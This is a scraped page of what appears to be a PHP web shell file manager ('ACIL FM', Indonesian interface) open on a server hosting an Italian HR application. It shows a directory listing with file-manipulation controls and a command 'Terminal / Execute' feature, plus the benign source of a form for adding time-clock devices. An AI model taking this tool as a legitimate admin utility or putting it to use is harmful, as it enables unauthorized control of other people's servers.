ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/app/NH-HR-test-old/ds/public/settings
/
home
mhhtmff
app
NH-HR-test-old
ds
public
settings
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
check_parameters_content.php
2.86 MB
chmod
View
DL
Edit
Rename
Delete
company_datas_content.php
952 B
chmod
View
DL
Edit
Rename
Delete
cron_jobs_list.php
1.9 MB
chmod
View
DL
Edit
Rename
Delete
cron_logs_list.php
810 B
chmod
View
DL
Edit
Rename
Delete
edit_cron_job_content.php
10.94 MB
chmod
View
DL
Edit
Rename
Delete
edit_justification_content.php
3.12 MB
chmod
View
DL
Edit
Rename
Delete
edit_payments_office_content.php
2.7 MB
chmod
View
DL
Edit
Rename
Delete
edit_stamper_content.php
2.79 MB
chmod
View
DL
Edit
Rename
Delete
justifications_content.php
1.22 MB
chmod
View
DL
Edit
Rename
Delete
new_cron_job_content.php
4.54 MB
chmod
View
DL
Edit
Rename
Delete
new_justification_content.php
2.11 MB
chmod
View
DL
Edit
Rename
Delete
new_payments_office_content.php
2.04 MB
chmod
View
DL
Edit
Rename
Delete
new_stamper_content.php
2.16 MB
chmod
View
DL
Edit
Rename
Delete
payments_office_content.php
1.3 MB
chmod
View
DL
Edit
Rename
Delete
settings_list.php
7.28 MB
chmod
View
DL
Edit
Rename
Delete
stampers_list.php
1.29 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/app/NH-HR-test-old/ds/public/settings/new_stamper_content.php
<?php session_start(); if (!isset($_SESSION['loggedin'])) { exit("unauthorized"); } ?> <div class="modal-header"> <h5 class="modal-title" id="exampleModalLabel">Nuovo timbratore</h5> <button class="close" type="button" data-dismiss="modal" aria-label="Close" id="close_new_stamper"><span aria-hidden="true">×</span></button> </div> <div class="modal-body"> <form> <div class="form-group row"> <label class="col-sm-2 col-form-label" for="inputEmail3">Nome</label> <div class="col-sm-10"> <input class="form-control" id="name" type="text" placeholder="Nome"> </div> </div> <div class="form-group row"> <label class="col-sm-2 col-form-label" for="inputEmail3">Indirizzo IP</label> <div class="col-sm-10"> <input class="form-control" id="ip_address" type="text" placeholder="Indirizzo IP"> </div> </div> <div class="form-group row"> <label class="col-sm-2 col-form-label" for="inputEmail3">Descrizione</label> <div class="col-sm-10"> <input class="form-control" id="description" type="text" placeholder="Descrizione"> </div> </div> <div class="form-group row"> <label class="col-sm-2 col-form-label" for="inputEmail3">Ubicazione</label> <div class="col-sm-10"> <input class="form-control" id="location" type="text" placeholder="Ubicazione"> </div> </div> <div class="form-group row"> <label class="col-sm-2 col-form-label" for="inputEmail3">Nome file importazione</label> <div class="col-sm-10"> <input class="form-control" id="file_name" type="text" placeholder="Nome file"> </div> </div> </form> </div> <div class="modal-footer"> <button class="btn btn-secondary" type="button" data-dismiss="modal">Chiudi</button> <button class="btn btn-primary ml-2" type="button" onclick="createStamper()" id="create_stamper_button">Crea</button> <div class="spinner spinner-primary mr-3" style="display: none;" id="create_stamper_loader"></div> </div>
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply